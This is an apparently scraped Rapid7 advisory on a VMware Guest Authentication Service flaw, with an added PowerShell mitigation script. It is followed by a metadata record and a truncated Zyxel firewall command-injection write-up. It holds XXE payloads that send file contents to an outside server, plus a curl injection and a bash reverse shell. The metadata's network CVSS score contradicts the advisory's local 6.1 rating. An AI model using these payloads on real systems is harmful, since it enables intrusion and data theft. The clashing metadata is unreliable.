
A low-privileged local attacker can prevent the VMware Guest Authentication service (VGAuthService.exe) from running in a guest Windows environment and can crash this service, thus rendering the guest unstable. In some very contrived circumstances, the attacker can leak file content to which they do not have read access. We believe this would be scored as CVSSv3 AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H or 6.1 and is an instance of [CWE-73: External Control of File Name or Path](<https://cwe.mitre.org/data/definitions/73.html>).
## Product description
The VMware Guest Authentication Service (VGAuthService.exe) is part of the VMware Tools suite of software used to provide integration services with other VMware services. It is commonly installed on Windows guest operating systems, though it appears that its only function is to [mystify users](<https://www.google.com/search?q=vmware+%22Guest+Authentication+Service%22>) when it fails.
## Credit
This issue was discovered by Jake Baines of Rapid7. It is being disclosed in accordance with [Rapid7's vulnerability disclosure policy](<https://www.rapid7.com/disclosure/>).
## Exploitation
The versions of VMware host and guest operating systems are:
* **Host platform:** MacOS Big Sur 11.6.1
* **Host software:** VMware Fusion Professional 12.2.1 (18811640)
* **Virtualized platform:** Windows 10.0.17763.1999 and Windows Server 2019
* **Vulnerable software:** VGAuthService.exe (VMware Guest Authentication Service) “File version: 11.3.5.59284”, “Product version 1.0.0. Build-18556986”
Once running, the VMware Guest Authentication Service (VGAuthService.exe) is a service running with `NT AUTHORITY/SYSTEM` permissions and attempts to read files from the non-existent directory `C:\Program%20Files\VMware\VMware%20Tools\` during start-up.

A low-privileged user can create this directory structure and cause VGAuthService.exe to read attacker-controlled files. The files that the attacker controls are “catalog”, “xmldsig-core-schema.xsd”, and “xenc-schema.xsd”. These files define the XML structure used to communicate with VGAuthService.exe.
However, actually modifying the structure of these files seems to have limited effect on VGAuthService.exe. Below, we describe a denial of service (which could take a number of forms) and a file content leak via XML External Entity (XXE) processing.
## Impact
The most likely impact of an exploit leveraging this vulnerability is a denial-of-service condition, and there is a remote possibility of privileged file content exfiltration.
### Denial of service
A low-privileged user can prevent the service from starting by providing a malformed catalog file. For example, creating the file `C:\Program%20Files\VMware\VMware%20Tools\etc\catalog` with the following contents:
```xml
<?xml version="1.0"?>
<!DOCTYPE catalog PUBLIC "-//OASIS//DTD Entity Resolution XML Catalog V1.0//EN" "http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd">
<catalog xmlns="urn:oasis:names:tc:entity:xmlns:xml:catalog">
<uri name="http://www.w3.org/TR/2002/REC-xmldsig-core-20020212/xmldsig-core-schema.xsd" uri="xmldsig-core-schema.xsd"/>
<uri name="http://www.w3.org/TR/2002/REC-xmlenc-core-20021210/xenc-schema.xsd" uri="\\10.0.0.2\fdsa\xenc-schema.xsd"/>
</catalog>
```
will simply prevent the service from ever running because of the malformed uri field. The VGAuthService log file in `C:\ProgramData\VMware\VMware VGAuth\logfile.txt.0` will contain this line:
```text
[2022-02-01T14:03:50.100Z] [ warning] [VGAuthService] XML Error: uri entry 'uri' broken ?: \\10.0.0.2\fdsa\xenc-schema.xsd
```
After the “malicious” file is created, the system must be rebooted (or the service restarted). Until this happens, some remote tooling for the VMware guest will not function properly.
### File content exfiltration via XML external entity (XXE) attacks, and the limitations thereof
VGAuthService uses XML libraries (libxmlsec and libxml2) that have XML External Entity processing capabilities. Because the attacker controls various XML files parsed by the service, the attacker in theory can execute XXE injection and XXE out-of-band (OOB) attacks to leak files that a low-privileged user can’t read (e.g. C:\windows\win.ini).
It is true that these styles of attacks do work against VGAuthService.exe, but there is a severe limitation. Traditionally, an XXE OOB attack leaks the file of the attacker's choosing via an HTTP or FTP URI, for example `http://attackurl:80/endpoint?FILEDATA`, where FILEDATA is the contents of the file. However, the XML library that VGAuthService.exe is using, libxml2, is very strict about properly formatted URIs, and any space character or newline will cause the exfiltration to fail. For example, let’s say we wanted to perform an XXE OOB attack and leak the contents of C:\Windows\win.ini. We’d create the following file at `C:\Program%20Files\VMware\VMware%20Tools\etc\catalog`:
```xml
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://10.0.0.2/r7.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>
```
And then we’d create the file `r7.dtd` on 10.0.0.2:
```xml
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.0.0.2/xxe?%data;'>">
```
And serve the r7.dtd file via a Python server on 10.0.0.2:
```text
albinolobster@ubuntu:~/oob$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```
Once the attack is triggered, VGAuthService.exe will make quite a few HTTP requests to the attacker's HTTP server:
```text
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
10.0.0.88 - - [01/Feb/2022 06:33:52] "GET /r7.dtd HTTP/1.0" 200 -
```
But notice that none of those HTTP requests contain the contents of win.ini. To see why, let’s take a look at VGAuthService’s log file.
```text
[2022-02-01T14:34:00.528Z] [ warning] [VGAuthService] XML Error: parser
[2022-02-01T14:34:00.528Z] [ warning] [VGAuthService] XML Error: error :
[2022-02-01T14:34:00.528Z] [ warning] [VGAuthService] XML Error: Invalid URI: http:///10.0.0.2/xxe?; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
```
Here, we can see the contents of win.ini have been appended to `http://10.0.0.2/xxe?` and that has caused the XML library to error out due to an invalid URI. So we can’t leak win.ini over the network, but we were able to write it to VGAuthService’s log. Unfortunately (or fortunately, for defenders), the log file is only readable by administrative users, so leaking the contents of win.ini to the log file is no good for an attack.
An attacker _can_ leak a file as long as it can be used to form a valid URI. I can think of one very specific case where ManageEngine has a “user” saved to file as “0:verylongpassword” where this could work. But that’s super specific. Either way, we can recreate this like so:
```text
C:\>echo|set /p="helloworld" > r7.txt

C:\>type r7.txt
helloworld
C:\>
```
We then do the same attack as above, but instead of `<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">` we use `<!ENTITY % data SYSTEM "file:///c:/r7.txt">`.
After executing the attack, we’ll see this on our HTTP server:
```text
10.0.0.88 - - [01/Feb/2022 07:25:05] "GET /xxe?helloworld HTTP/1.0" 404 -
```
While this is technically a low-privileged user leaking a file, it is quite contrived, and honestly an unlikely scenario.
Another common XXE attack is leaking NTLM hashes, but libxml2 doesn’t honor UNC paths so that isn’t a possibility. So, in conclusion, the low-privileged attacker can only deny access to the service and, very occasionally, leak privileged files.
## Remediation
VMware administrators who expect low-privileged, untrusted users to interact directly with the guest operating system should apply the patch at their convenience to avoid the denial-of-service condition. As stated above, the likelihood of anyone exploiting this vulnerability to exfiltrate secrets from the guest operating system is quite low, but if those circumstances apply to your environment, more urgency in patching is warranted.
In the absence of a patch, VMware administrators can create the missing directory with write permissions limited to administrators, and this should mitigate the issue entirely.
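As an added example (not code from the Rapid7 write-up or from VMware Tools), the PowerShell below implements the workaround just described, pre-creating the probed directory with an ACL that only SYSTEM and Administrators can write to, and also pulls the `XML Error` warnings quoted in the log excerpts above out of the VGAuthService log so a defender can spot a planted catalog. It assumes the two paths quoted in the write-up, an elevated PowerShell 5.1 or later prompt, and hypothetical function names of my own choosing.

```powershell
# Added example; not part of the Rapid7 advisory or of VMware Tools.
# Run from an elevated PowerShell prompt (5.1 or later) on the Windows guest.
# The two paths are the ones quoted in the write-up above.
$ProbeDir  = 'C:\Program%20Files\VMware\VMware%20Tools'
$VGAuthLog = 'C:\ProgramData\VMware\VMware VGAuth\logfile.txt.0'
$AdminPrincipals = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators')

function Protect-ProbeDir {
    # Mitigation: create the directory VGAuthService.exe probes at start-up
    # before a low-privileged user can, and let only SYSTEM/Administrators
    # write into it. Hypothetical helper name.
    param([string]$Path = $ProbeDir)
    $null = New-Item -ItemType Directory -Path (Join-Path $Path 'etc') -Force

    $acl = Get-Acl -LiteralPath $Path
    # Drop the ACEs inherited from C:\ (Authenticated Users may create
    # folders there, which is what lets the planted files appear).
    $acl.SetAccessRuleProtection($true, $false)
    $inherit = [System.Security.AccessControl.InheritanceFlags]'ContainerInherit, ObjectInherit'
    $prop    = [System.Security.AccessControl.PropagationFlags]::None
    foreach ($principal in $AdminPrincipals) {
        $acl.AddAccessRule([System.Security.AccessControl.FileSystemAccessRule]::new(
            $principal, 'FullControl', $inherit, $prop, 'Allow'))
    }
    # Everyone else keeps read/execute only, mirroring the real Program Files tree.
    $acl.AddAccessRule([System.Security.AccessControl.FileSystemAccessRule]::new(
        'BUILTIN\Users', 'ReadAndExecute', $inherit, $prop, 'Allow'))
    Set-Acl -LiteralPath $Path -AclObject $acl
}

function Get-ProbeDirWriters {
    # Audit: list every non-admin principal that can still create or write
    # files under the probed directory. Empty output means the mitigation holds.
    param([string]$Path = $ProbeDir)
    if (-not (Test-Path -LiteralPath $Path)) {
        Write-Warning "$Path does not exist; any local user could create it."
        return
    }
    $writeMask = [System.Security.AccessControl.FileSystemRights]'Write, CreateFiles, CreateDirectories'
    (Get-Acl -LiteralPath $Path).Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            (([int]$_.FileSystemRights -band [int]$writeMask) -ne 0) -and
            ($_.IdentityReference.Value -notin $AdminPrincipals)
        } |
        Select-Object IdentityReference, FileSystemRights, IsInherited
}

function Get-VGAuthXmlErrors {
    # Detection: pull the "XML Error" warnings (the 'uri entry ... broken' and
    # 'Invalid URI' lines shown above) out of the VGAuthService log.
    param([string]$LogPath = $VGAuthLog)
    if (-not (Test-Path -LiteralPath $LogPath)) { return }
    $pattern = '^\[(?<ts>[^\]]+)\] \[\s*warning\] \[VGAuthService\] XML Error: (?<msg>.*)$'
    Get-Content -LiteralPath $LogPath | ForEach-Object {
        if ($_ -match $pattern) {
            [pscustomobject]@{ Timestamp = $Matches.ts; Message = $Matches.msg.Trim() }
        }
    }
}

Protect-ProbeDir
Get-ProbeDirWriters      # expect no output once the ACL has been applied
Get-VGAuthXmlErrors | Format-Table -AutoSize
```

Any `XML Error` line that appears after the directory has been locked down is worth treating as a sign that the files were planted before the mitigation, since the service has no reason to log one otherwise.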
## Disclosure timeline
* **February, 2022:** Issue discovered by Jake Baines of Rapid7
* **Thu, Feb 24, 2022:** Initial disclosure to [security@vmware.com](<mailto:security@vmware.com>)
* **Thu, Feb 24, 2022:** Issue tracked as VSRC-10022.
* **Wed, Mar 02, 2022:** Vendor asks for an extension beyond original April disclosure date
* **Mon, May 23, 2022:** CVE-2022-22977 reserved by the vendor
* **Tue, May 24, 2022:** This disclosure, as well as the [vendor's disclosure](<https://www.vmware.com/security/advisories/VMSA-2022-0015.html>), published
{"id": "RAPID7BLOG:906A9E6EA4F0C790B0063AB06B04CFE0", "vendorId": null, "type": "rapid7blog", "bulletinFamily": "info", "title": "CVE-2022-22977: VMware Guest Authentication Service LPE (FIXED)", "description": "\n\nA low-privileged local attacker can prevent the VMware Guest Authentication service (VGAuthService.exe) from running in a guest Windows environment and can crash this service, thus rendering the guest unstable. In some very contrived circumstances, the attacker can leak file content to which they do not have read access. We believe this would be scored as CVSSv3 AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H or 6.1 and is an instance of [CWE-73: External Control of File Name or Path](<https://cwe.mitre.org/data/definitions/73.html>).\n\n## Product description\n\nThe VMware Guest Authentication Service (VGAuthService.exe) is part of the VMware Tools suite of software used to provide integration services with other VMware services. It is commonly installed on Windows guest operating systems, though it appears that its only function is to [mystify users](<https://www.google.com/search?q=vmware+%22Guest+Authentication+Service%22>) when it fails.\n\n## Credit\n\nThis issue was discovered by Jake Baines of Rapid7. It is being disclosed in accordance with [Rapid7's vulnerability disclosure policy](<https://www.rapid7.com/disclosure/>).\n\n## Exploitation\n\nThe versions of VMware host and guest operating systems are:\n\n * **Host platform: **MacOS Big Sur 11.6.1\n * **Host software: **VMware Fusion Professional 12.2.1 (18811640)\n * **Virtualized platform:** Windows 10.0.17763.1999 and Windows Server 2019\n * **Vulnerable software: **VGAuthService.exe (VMware Guest Authentication Service) \u201cFile version: 11.3.5.59284\u201d, \u201cProduct version 1.0.0. 
Build-18556986\u201d\n\nOnce running, the VMware Guest Authentication Service (VGAuthService.exe) is a service running with `NT AUTHORITY/SYSTEM` permissions and attempts to read files from the non-existent directory `C:\\Program%20Files\\VMware\\VMware%20Tools\\` during start-up.\n\n\n\nA low-privileged user can create this directory structure and cause VGAuthService.exe to read attacker controlled files. The files that the attacker controls are \u201ccatalog\u201d, \u201cxmldsig-core-schema.xsd\u201d, and \u201cxenc-schema.xsd\u201d. These files are used to define the XML structure used to communicate with VGAuthService.exe.\n\nHowever, actually modifying the structure of these files seems to have limited effects on VGAuthService.exe. Below, we describe a denial of service (which could take a number of forms) and a file content leak via XML External Entity.\n\n## Impact\n\nThe most likely impact of an exploit leveraging this vulnerability is a denial-of-service condition, and there is a remote possibility of privileged file content exfiltration.\n\n### Denial of service\n\nA low-privileged user can prevent the service from starting by providing a malformed catalog file. For example, creating the file C:\\Program%20Files\\VMware\\VMware%20Tools\\etc\\catalog with the contents of:\n \n \n <?xml version=\"1.0\"?>\n <!DOCTYPE catalog PUBLIC \"-//OASIS//DTD Entity Resolution XML Catalog V1.0//EN\" \"http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd\">\n <catalog xmlns=\"urn:oasis:names:tc:entity:xmlns:xml:catalog\">\n <uri name=\"http://www.w3.org/TR/2002/REC-xmldsig-core-20020212/xmldsig-core-schema.xsd\" uri=\"xmldsig-core-schema.xsd\"/>\n <uri name=\"http://www.w3.org/TR/2002/REC-xmlenc-core-20021210/xenc-schema.xsd\" uri=\"\\\\10.0.0.2\\fdsa\\xenc-schema.xsd\"/>\n </catalog>\n \n\nWill simply prevent the service from ever running due to the malformed uri field. 
The VGAuthService log file in `C:\\ProgramData\\VMware\\VMware VGAuth\\logfile.txt.0` will contain this line:\n \n \n [2022-02-01T14:03:50.100Z] [ warning] [VGAuthService] XML Error: uri entry 'uri' broken ?: \\\\10.0.0.2\\fdsa\\xenc-schema.xsd\n \n\nAfter the \u201cmalicious\u201d file is created, the system must be rebooted (or the service restarted). Until this happens, some remote tooling for the VMware guest will not function properly.\n\n### File content exfiltration via XML external entity (XXE) attacks, and the limitations thereof\n\nVGAuthService uses XML libraries (libxmlsec and libxml2) that have XML External Entity processing capabilities. Because the attacker controls various XML files parsed by the service, the attacker in theory can execute XXE injection and XXE out-of-band (OOB) attacks to leak files that a low-privileged user can\u2019t read (e.g. C:\\windows\\win.ini).\n\nIt is true that these styles of attacks do work against VGAuthService.exe, but there is a severe limitation. Traditionally, an XXE OOB attack leaks the file of the attackers choosing via an HTTP or FTP uri. For example, \u201c[http://attackurl:80/endpoint?FILEDATA\u201d](<http://attackurl:80/endpoint?FILEDATA%E2%80%9D>) where FILEDATA is the contents of the file. However, the XML library that VGAuthService.exe is using, libxml2, is very strict about properly formatted URI and any space character or newline will cause the exfiltration to fail. For example, let\u2019s say we wanted to perform an XXE OOB attack and leak the contents of C:\\Windows\\win.ini. 
I\u2019d create the following file at `C:\\Program%20Files\\VMware\\VMware%20Tools\\etc\\catalog`\n \n \n <?xml version=\"1.0\" ?>\n <!DOCTYPE r [\n <!ELEMENT r ANY >\n <!ENTITY % sp SYSTEM \"http://10.0.0.2/r7.dtd\">\n %sp;\n %param1;\n ]>\n <r>&exfil;</r>\n \n\nAnd then we\u2019d create the file `r7.dtd` on 10.0.0.2:\n \n \n <!ENTITY % data SYSTEM \"file:///c:/windows/win.ini\">\n <!ENTITY % param1 \"<!ENTITY exfil SYSTEM 'http://10.0.0.2/xxe?%data;'>\">\n \n\nAnd server the r7.dtd file via a python server on 10.0.0.2:\n \n \n albinolobster@ubuntu:~/oob$ sudo python3 -m http.server 80\n Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...\n \n\nOnce the attack is triggered, VGAuthService.exe will make quite a few HTTP requests to the attackers HTTP server:\n \n \n Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] 
\"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n \n\nBut notice that none of those HTTP requests contain the contents of win.ini. To see why, let\u2019s take a look at VGAuthService\u2019s log file.\n \n \n [2022-02-01T14:34:00.528Z] [ warning] [VGAuthService] XML Error: parser \n [2022-02-01T14:34:00.528Z] [ warning] [VGAuthService] XML Error: error : \n [2022-02-01T14:34:00.528Z] [ warning] [VGAuthService] XML Error: Invalid URI: http:///10.0.0.2/xxe?; for 16-bit app support\n [fonts]\n [extensions]\n [mci extensions]\n [files]\n [Mail]\n MAPI=1\n \n\nHere, we can see the contents of win.ini have been appended to `http://10.0.0.2/xxe?` and that has caused the XML library to error out due to an invalid URI. So we can\u2019t leak win.ini over the network, but we were able to write it to VGAuthService\u2019s log. Unfortunately (or fortunately, for defenders), the log file is only readable by administrative users, so leaking the contents of win.ini to the log file is no good for an attack.\n\nAn attacker _can_ leak a file as long as it can be used to form a valid URI. I can think of one very specific case where ManageEngine has a \u201cuser\u201d saved to file as \u201c0:verylongpassword\u201d where this could work. But that\u2019s super specific. 
Either way, we can recreate this like so:\n \n \n C:\\>echo|set /p=\"helloworld\" > r7.txt\n \n C:\\>type r7.txt\n helloworld\n C:\\>\n \n\nWe then do the same attack as above, but instead of `<!ENTITY % data SYSTEM \"file:///c:/windows/win.ini\">` we do `<!ENTITY % data SYSTEM \"file:///c:/r7.txt\">`\n\nAfter executing the attack, we\u2019ll see this on our HTTP server:\n \n \n 10.0.0.88 - - [01/Feb/2022 07:25:05] \"GET /xxe?helloworld HTTP/1.0\" 404 -\n \n\nWhile this is technically a low-privileged user leaking a file, it is quite contrived, and honestly an unlikely scenario.\n\nAnother common XXE attack is leaking NTLM hashes, but libxml2 doesn\u2019t honor UNC paths so that isn\u2019t a possibility. So, in conclusion, the low-privileged attacker can only deny access to the service and, very occasionally, leak privileged files.\n\n## Remediation\n\nVMware administrators who expect low-privileged, untrusted users to interact directly with the guest operating system should apply the patch at their convenience to avoid the denial-of-service condition. 
As stated above, the likelihood of anyone exploiting this vulnerability to exfiltrate secrets from the guest operating system is quite low, but if those circumstances apply to your environment, more urgency in patching is warranted.\n\nIn the absence of a patch, VMware administrators can create the missing directory with write permissions limited to administrators, and this should mitigate the issue entirely.\n\n## Disclosure timeline\n\n * **February, 2022: **Issue discovered by Jake Baines of Rapid7\n * **Thu, Feb 24, 2022:** Initial disclosure to [security@vmware.com](<mailto:security@vmware.com>)\n * **Thu, Feb 24, 2022:** Issue tracked as VSRC-10022.\n * **Wed, Mar 02, 2022: **Vendor asks for an extension beyond original April disclosure date\n * **Mon, May 23, 2022:** CVE-2022-22977 reserved by the vendor\n * **Tue, May 24, 2022: **This disclosure, as well as the [vendor's disclosure](<https://www.vmware.com/security/advisories/VMSA-2022-0015.html>) published\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n_**Additional reading:**_\n\n * _[CVE-2022-30525 (FIXED): Zyxel Firewall Unauthenticated Remote Command Injection](<https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/>)_\n * _[2022 Cloud Misconfigurations Report: A Quick Look at the Latest Cloud Security Breaches and Attack Trends](<https://www.rapid7.com/blog/post/2022/04/20/2022-cloud-misconfigurations-report-a-quick-look-at-the-latest-cloud-security-breaches-and-attack-trends/>)_\n * _[CVE-2022-28810: ManageEngine ADSelfService Plus Authenticated Command Execution (Fixed)](<https://www.rapid7.com/blog/post/2022/04/14/cve-2022-28810-manageengine-adselfservice-plus-authenticated-command-execution-fixed/>)_\n * _[CVE-2022-24527: Microsoft Connected Cache Local Privilege Escalation 
(Fixed)](<https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/>)_", "published": "2022-05-24T18:00:00", "modified": "2022-05-24T18:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://blog.rapid7.com/2022/05/24/cve-2022-22977-vmware-guest-authentication-service-lpe-fixed/", "reporter": "Jake Baines", "references": [], "cvelist": ["CVE-2022-22977", "CVE-2022-24527", "CVE-2022-28810", "CVE-2022-30525"], "immutableFields": [], "lastseen": "2022-05-24T19:31:07", "viewCount": 17, "enchantments": {"vulnersScore": "PENDING"}, "_state": {}, "_internal": {}}
{"rapid7blog": [{"lastseen": "2022-05-23T17:34:26", "description": "\n\nRapid7 discovered and reported a vulnerability that affects Zyxel firewalls supporting Zero Touch Provisioning (ZTP), which includes the ATP series, VPN series, and the USG FLEX series (including USG20-VPN and USG20W-VPN). The vulnerability, identified as CVE-2022-30525, allows an unauthenticated and remote attacker to achieve arbitrary code execution as the `nobody` user on the affected device.\n\nThe following table contains the affected models and firmware versions.\n\nAffected Model | Affected Firmware Version \n---|--- \nUSG FLEX 100, 100W, 200, 500, 700 | ZLD5.00 thru ZLD5.21 Patch 1 \nUSG20-VPN, USG20W-VPN | ZLD5.10 thru ZLD5.21 Patch 1 \nATP 100, 200, 500, 700, 800 | ZLD5.10 thru ZLD5.21 Patch 1 \n \nThe VPN series, which also supports ZTP, is not vulnerable because it does not support the required functionality.\n\n## Product description\n\nThe affected firewalls are [advertised](<https://www.zyxel.com/us/en/products_services/USG-FLEX-Firewall-USG-FLEX-700/features>) for both small branch and corporate headquarter deployments. They [offer](<https://www.zyxel.com/us/en/products_services/USG-FLEX-Firewall-USG-FLEX-700/license-and-spec>) VPN solutions, SSL inspection, web filtering, intrusion protection, and email security, and advertise up to 5 Gbps throughput through the firewall.\n\nThe affected models are relatively popular, with more than 15,000 visible on [Shodan](<https://www.shodan.io/search?query=title%3A%22USG+FLEX+100%22%2C%22USG+FLEX+100w%22%2C%22USG+FLEX+200%22%2C%22USG+FLEX+500%22%2C%22USG+FLEX+700%22%2C%22USG+FLEX+50%22%2C%22USG+FLEX+50w%22%2C%22ATP100%22%2C%22ATP200%22%2C%22ATP500%22%2C%22ATP700%22>).\n\n\n\n## CVE-2022-30525: Unauthenticated remote command injection\n\nThe affected models are vulnerable to unauthenticated and remote command injection via the administrative HTTP interface. Commands are executed as the `nobody` user. 
This vulnerability is exploited through the `/ztp/cgi-bin/handler` URI and is the result of passing unsanitized attacker input into the `os.system` method in `lib_wan_settings.py`. The vulnerable functionality is invoked in association with the `setWanPortSt` command. An attacker can inject arbitrary commands into the `mtu` or the `data` parameter. Below is an example `curl` that will cause the firewall to execute `ping 192.168.1.220`:\n \n \n curl -v --insecure -X POST -H \"Content-Type: application/json\" -d\n '{\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"4\",\"vlan_tagged\"\n :\"1\",\"vlanid\":\"5\",\"mtu\":\"; ping 192.168.1.220;\",\"data\":\"hi\"}'\n https://192.168.1.1/ztp/cgi-bin/handler\n \n\nOn the firewall, the `ps` output looks like the following:\n \n \n nobody 11040 0.0 0.2 21040 5152 ? S Apr10 0:00 \\_ /usr/local/apache/bin/httpd -f /usr/local/zyxel-gui/httpd.conf -k graceful -DSSL\n nobody 16052 56.4 0.6 18104 11224 ? S 06:16 0:02 | \\_ /usr/bin/python /usr/local/zyxel-gui/htdocs/ztp/cgi-bin/handler.py\n nobody 16055 0.0 0.0 3568 1492 ? S 06:16 0:00 | \\_ sh -c /usr/sbin/sdwan_iface_ipc 11 WAN3 4 ; ping 192.168.1.220; 5 >/dev/null 2>&1\n nobody 16057 0.0 0.0 2152 564 ? S 06:16 0:00 | \\_ ping 192.168.1.220\n \n\nA reverse shell can be established using the normal bash [GTFOBin](<https://gtfobins.github.io/gtfobins/bash/#reverse-shell>). 
For example:\n \n \n curl -v --insecure -X POST -H \"Content-Type: application/json\" -d '\n {\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"4\",\"vlan_tagged\":\n \"1\",\"vlanid\":\"5\",\"mtu\":\"; bash -c \\\"exec bash -i &>/dev/tcp/\n 192.168.1.220/1270 <&1;\\\";\",\"data\":\"hi\"}' https://192.168.1.1\n /ztp/cgi-bin/handler\n \n\nThe resulting reverse shell can be used like so:\n \n \n albinolobster@ubuntu:~$ nc -lvnp 1270\n Listening on 0.0.0.0 1270\n Connection received on 192.168.1.1 37882\n bash: cannot set terminal process group (11037): Inappropriate ioctl for device\n bash: no job control in this shell\n bash-5.1$ id\n id\n uid=99(nobody) gid=10003(shadowr) groups=99,10003(shadowr)\n bash-5.1$ uname -a\n uname -a\n Linux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Mar 15 05:14:51 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux\n Bash-5.1\n \n\n## Metasploit module\n\nA [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/16563>) has been developed for these vulnerabilities. The module can be used to establish a `nobody` Meterpreter session. The following video demonstrates exploitation:\n\n\n\nWe\u2019ve shared a PCAP that captures Metasploit\u2019s exploitation of a Zyxel USG FLEX 100. The PCAP can be found attached to the module\u2019s [pull 